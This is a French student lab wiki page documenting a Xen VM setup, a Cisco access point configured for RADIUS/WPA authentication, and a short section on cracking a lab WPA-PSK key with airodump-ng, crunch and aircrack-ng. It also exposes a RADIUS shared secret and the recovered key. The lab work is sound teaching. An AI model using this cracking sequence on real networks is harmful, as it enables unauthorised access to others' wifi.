TP sysres IMA5sc 2019/2020 G5 : Différence entre versions

De Wiki d'activités IMA
(Séance 1)
(Création des VMs)
Ligne 23 : Ligne 23 :
 
 
 
 
 
   xen-create-image --hostname=chaudepisse --dhcp --dir=/usr/local/xen/ --force
 
   xen-create-image --hostname=chaudepisse --dhcp --dir=/usr/local/xen/ --force
 +
 +
===Configuration du serveur Freeradius===
 +
 +
===Configuration de la borne wifi===
 +
 +
Il suffit de créer un model contenant les informations nécessaires à la connexion au Freeradius.
 +
 +
ap(config)#aaa new-model
 +
ap(config)#aaa authentication login eap_groupe5 group radius_group5
 +
ap(config)#aaa group server radius radius_group5
 +
ap(config-sg-radius)#server 193.48.57.181 auth-port 1812 acct-port 1813
 +
ap(config-sg-radius)#auth-port 1812 acct-port 1813 key secretIMA5SC       
 +
ap(config)#exit
 +
 +
En faisant cela, on peut voir que notre serveur radius est bien enregistré
 +
ap#show aaa servers
 +
 +
Puis on peut créer le réseau wifi :
 +
 +
ap#conf t
 +
ap(config)#dot11 ssid Chaudepisse
 +
ap(config-ssid)#vlan 5
 +
ap(config-ssid)#authentication open eap eap_group5
 +
ap(config-ssid)#authentication network-eap eap_group5
 +
ap(config-ssid)#authentication key-management wpa
 +
ap(config-ssid)#Mbssid Guest-mode
 +
ap(config-ssid)#end
 +
 +
puis :
 +
 +
ap(config)#int dot11radio0
 +
ap(config-if)#Mbssid
 +
ap(config-if)#encryption vlan 5 mode ciphers aes-ccm tkip
 +
ap(config-if)#ssid Chaudepisse
 +
ap(config-if)#end
 +
 +
et enfin l'encapsulation
 +
 +
ap(config)#int dot11radio0.11
 +
ap(config-subif)#encapsulation dot1Q 5
 +
ap(config-subif)#end
 +
 +
et
 +
 +
ap(config)#int dot11radio0.11 
 +
ap(config-subif)#encapsulation dot1q 5
 +
ap(config-subif)#bridge-group 5
 +
ap(config-subif)#end
 +
 +
En n'oubliant pas de démarrer l'interface :) :
 +
ap(config)#interface Dot11Radio0
 +
ap(config-if)#no shut
 +
ap(config-if)#no shutdown
  
 
== Intrusion ==
 
== Intrusion ==

Version du 16 décembre 2019 à 18:04

Création des VMs

Nous avons commandés les noms de domaines sur le site gandi.net.

Tout d'abord, nous avons réserver le nom de domaine via gandi.net: chaudepisse.site.

Installation

Tout d’abord nous allons créer une machine virtuelle sur cordouan grâce à l’hyperviseur Xen.

On se connecte d'abord en SSH à Cordouan, puis on spécifie le proxy pour pouvoir ensuite récupérer les packages. On peut alors créer l'image de la machine en spécifiant --dhcp car on ne connaît pas encore l’adresse IP.

Tout d'abord, il faut se connecter en SSH sur le serveur cordouan.insecserv.deule.net avec l'utilisateur root et le mot de passe habituel.

 ssh root@cordouan.insecserv.deule.net	

Ensuite, nous avons installés les VM xen. Pour se faire, il suffit de spécifier les proxys de polytech.

export http_proxy=http://proxy.polytech-lille.fr/	
export https_proxy=https://proxy.polytech-lille.fr/

Et lancer la commande d'installation des VM xen.

 xen-create-image --hostname=chaudepisse --dhcp --dir=/usr/local/xen/ --force

Configuration du serveur Freeradius

Configuration de la borne wifi

Il suffit de créer un model contenant les informations nécessaires à la connexion au Freeradius.

ap(config)#aaa new-model
ap(config)#aaa authentication login eap_groupe5 group radius_group5
ap(config)#aaa group server radius radius_group5 
ap(config-sg-radius)#server 193.48.57.181 auth-port 1812 acct-port 1813
ap(config-sg-radius)#auth-port 1812 acct-port 1813 key secretIMA5SC         
ap(config)#exit

En faisant cela, on peut voir que notre serveur radius est bien enregistré

ap#show aaa servers

Puis on peut créer le réseau wifi :

ap#conf t
ap(config)#dot11 ssid Chaudepisse
ap(config-ssid)#vlan 5
ap(config-ssid)#authentication open eap eap_group5
ap(config-ssid)#authentication network-eap eap_group5
ap(config-ssid)#authentication key-management wpa
ap(config-ssid)#Mbssid Guest-mode
ap(config-ssid)#end

puis :

ap(config)#int dot11radio0
ap(config-if)#Mbssid
ap(config-if)#encryption vlan 5 mode ciphers aes-ccm tkip
ap(config-if)#ssid Chaudepisse
ap(config-if)#end

et enfin l'encapsulation

ap(config)#int dot11radio0.11
ap(config-subif)#encapsulation dot1Q 5
ap(config-subif)#end

et

ap(config)#int dot11radio0.11   
ap(config-subif)#encapsulation dot1q 5
ap(config-subif)#bridge-group 5
ap(config-subif)#end

En n'oubliant pas de démarrer l'interface :) :

ap(config)#interface Dot11Radio0
ap(config-if)#no shut
ap(config-if)#no shutdown

Intrusion

Les clés WEP et WPA ont été toutes les deux crackées. Il y a une net différence entre les deux.


Pour notre part, nous avons consacrès nos efforts sur le crackage d'une clé de type WPA-PSK. Le nom du réseau est kracotte06. Pour se faire, il suffit (après avoir passé sa carte wifi en mode monitoring) via airmon-ng.

Ensuite, il faut écouter le réseau à la rechercher d'un handshake.

airodump-ng --encrypt wpa wlan0mon

Une fois le SSID récupéré, il suffit d'utiliser la commande suivante afin d'enregistrer les paquets reçus

airodump-ng --bssid 04:DA:D2:9C:50:5D --ch 2 -w cap

Une fois les paquets reçu (Attention il faut qu'un handshake ait été reçu)

Il faut ensuite créer un dictionnaire afin d'obtenir toutes les possibilitées à tester lors de l'attaque bruteforce.

crunch 8 8 0123456789 -o dico.txt

Puis, il suffit de lancer l'algorithme de bruteforce afin de déterminer les différentes clés PSK, TSK...

aircrack-ng cap.cap -w dico.txt


Screenshot 2019-11-25 16-38-24.png

La clé à été trouvée en 42 minutes et est 20133333